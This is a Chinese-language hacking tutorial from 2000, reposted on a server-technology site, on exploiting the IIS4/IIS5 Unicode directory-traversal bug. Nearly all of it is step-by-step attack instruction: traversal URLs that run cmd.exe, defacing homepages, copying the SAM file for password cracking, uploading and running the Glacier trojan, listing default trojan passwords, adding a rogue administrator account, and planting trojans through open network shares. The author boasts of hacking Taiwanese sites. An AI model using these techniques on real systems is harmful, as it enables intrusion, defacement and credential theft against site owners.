iis5的特点 IIS5 UNICODE编码漏洞的利用心得 - IIS - 服务器之家

服务器之家

专注于服务器技术!
当前位置:首页 > Web服务器 > IIS

iis5的特点 IIS5 UNICODE编码漏洞的利用心得

发布时间:2017-05-08 来源:服务器之家

  大家一定都知道那个风光了很久的iis5 unicode 编码漏洞吧。没办法,第一篇教程不知道写什么好,随便先凑合着,
就写一下这个漏洞的攻击心得吧。

1 首先我们来看看这个漏洞的原理。
在中文版的iis4,和iss5中,存在一个bug,原因是unicode编码 存在bug 在unicode 编码中,发现了一个奇怪的编码方
式,

例如:

%c1%hh %c0%hh (0x00〈= 0xhh 〈 0x40)
iis 把 "%c1%hh" 编码成(0xc1 -0xc0) * 0x40 + 0xhh.

例如
(windows 2000 + iis 5.0 + sp1 简体中文版):
iis 将返回"@.ida" 找不到该文件 在这里 (0xc1-0xc0)*0x40+0x00=0x40=@

iis 将返回 "a.ida" 找不到该文件 这里 (0xc1-0xc0)*0x40+0x01=0x41=a

iis 将返回 "b.ida" 找不到该文件 ....

iis 将返回 "!.ida" 找不到该文件

这就意味着你能利用这些编码的特点。

例如:
%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = /
%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = \

所以我们就可以用这种方法进入一些目录。

这样我们将得到
directory of d:\inetpub\scripts
2000-09-28 15:49 〈dir〉
.   1999-07-21 17:49 147,456
count.exe 2000-09-12 17:08 438,290
count25.exe 2000-10-13 15:03 8,867
counter.err 2000-08-23 23:07 160,002
counter.exe 1999-05-25 18:14 3,925
extdgts.exe 2000-08-10 15:24 46,352
ism.dll 1999-07-21 17:49 64,512
mkstrip.exe 1999-05-25 18:181,317
readme.txt 2000-09-28 15:49

〈dir〉 wcount 9 file(s) 935,233 bytes

(2) 我们也可以利用此bug得到一些系统文件的内容
如果用 iis 4.0+sp6(中文版), 将不能测试成功 但是我们能用下列方法得到。
打上sp1仍然还有这种编码问题。

在英文版本中使用 %c1%af 能正常利用这个漏洞。

2.了解了漏洞的详细资料。让我们来说说怎么利用。
a.利用iisexploitsearcher这个软件,我们来找有这个漏洞的主机。
虽然这个漏洞公布很久了, 但你仍然会发现,你可以找到很多这种机器。
假如我们已经找到了一台有这个漏洞的机器。

让我们来进行下面的操作。

这个url语句的执行的命令是:利用nt/2000下的命令解释程序cmd.exe来执行一个拷贝命令。

copy c:\winnt\system32\cmd.exe ccc.exe

它把c:\winnt\system32\cmd.exe 拷贝到了c:\inetpub\scripts\ccc.exe

就是dos命令中的空格,在url中就要换成“+”号。

你要执行copy c:\winnt\system32\cmd.exe ccc.exe

其中/scripts/..%c1%1c../winnt/system32/cmd.exe?/c是固定的,他的作用是调用c:\winnt\system32\cmd.exe来执行命
令。

噢,忘了说为什么要拷贝cmd.exe了。

因为微软的iis加载程序的时候检测到有串cmd.exe的话就要检测特殊字符“&(,;%<>”,所以必须改名。

c.这时c:\winnt\system32\cmd.exe已经拷贝到了c:\inetpub\scripts\ccc.exe

通过

我们就可以调用到cmd.exe了,就是说不用那个编码了。

主页面就被修改成了:

hacked by lion

20/10/2000

也就是说,已经把他的主页黑了。

:p

下面是一些解释。

其中echo 是一个回显命令。

你在dos下打一个echo hacked by lion 看看。

它是在屏幕上显示

hacked by lion

不只这样

你也可以让它把东西写进一个文件。

echo hacked by lion > lion.txt

这样当前目录下的lion.txt文件里就有了hacked by lion的字样。

其中 > lion.txt的用途是把回显的字符写进lion.txt,它覆盖原来的内容。

你如果再想用echo 20/10/2000 > lion.txt 来写剩下的内容的话,

你会发现它覆盖了原来的内容hacked by lion。

怎么办呢?别急!

echo hacked by lion > lion.txt

echo 20/10/2000 >> lion.txt

看看吧

文件里面的是

hacked by lion

20/10/2000

成功了。

这样,就可以用上面的解释,把空格用"+"代替,就可以向别人的主页写任何东西了。

补充一点

好多站点\inetpub\下的scripts目录删除了, 但\program files\common files\system\下 的msadc还在

(有msadcs.dll漏洞的话就不用 %c1%1c了)。

这时可以如下构造请求:

就能调用到cmd.exe

3.当然,我们也不能只停留在黑主页的地步,当然想进一步控制整个机器了。

:p

下面来说说几种方法来控制这个机器。

a. 如果c:\winnt\repair\sam._存在

那么我们把copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\

然后用浏览器下载,用破nt密码的工具,比如l0phtcrack来破。

b.上载文件

1.找一个ftp服务器,将须上载的文件copy 到ftp服务器上,

假设这个 ftp server的 ip:127.1.1.1 ,username:abc,password:bbb 文件名:srv.exe

2.编辑一个上载执行文件

如果你看不懂上面的命令。

你在dos下打一个ftp /?看看。

:p

成功率很高的哦。

srv.exe是我放的一个冰河服务端。

下面不用我说了吧。

用冰河客户端连接他就可以了。

:p

顺便说一下

冰河的公用密码是:

05181977

他有70%左右的成功率。

subseven的共用密码是:

abuse

4.当然你也可以给他中一个nc99.exe等的东西。

获取administrator权限

上载getadmin.exe

getadmin iusr_机器名

这一招不一定有效哦。

http:/ip/scripts/ccc.exe?/c+net+user+aaa+12345+/add

http:/ip/scripts/ccc.exe?/c+net+localgroup+administrators+aaa+/add

c. 当然我们也有其他方法来上传文件。

前一段时间黑了几个台湾网站,net use也练得比较熟了。

看到有一个类似的教程用net use。

我也试了一下,累试不爽。呵呵

找个中转站,利用net use来上传文件。

我们要用到legion。

legion是一个扫描共享的软件。

你通过用它,你会找到一大堆的蠢伙。把整个c.d盘共享,并且不用密码的。

当然,设置密码也是没用的。呵呵猜26个字母就搞掂了。当然这要用另外一个软件。:p,在这就不说了。

找到后c盘或d盘后,

net use g: \\x.x.x.x\d

把他的d映射成你的g:盘。

现在我们来把东西拷贝到他的d盘,也就是你的g盘。

copy e:\tools\srv.exe o:\

拷贝一个文件,随便你哦。:p

你也可以在我的电脑里把它拖过去就可以了。:p

操作完成就不管他了。

让我们来回到服务器上操作。

建立连接和映射。

这个过程时间可能会长一点,耐心等等。

看看东西在不在哦:p

然后

直接运行就可以了。

:p

又一个中了木马。

但我不能保证它能100%成功哦。

d.用tftp上传文件。

但具体怎么用我没试过。:(

谁知道的写信告诉我。
lion
oicq:5437211
bunny_lion@
2000/11/23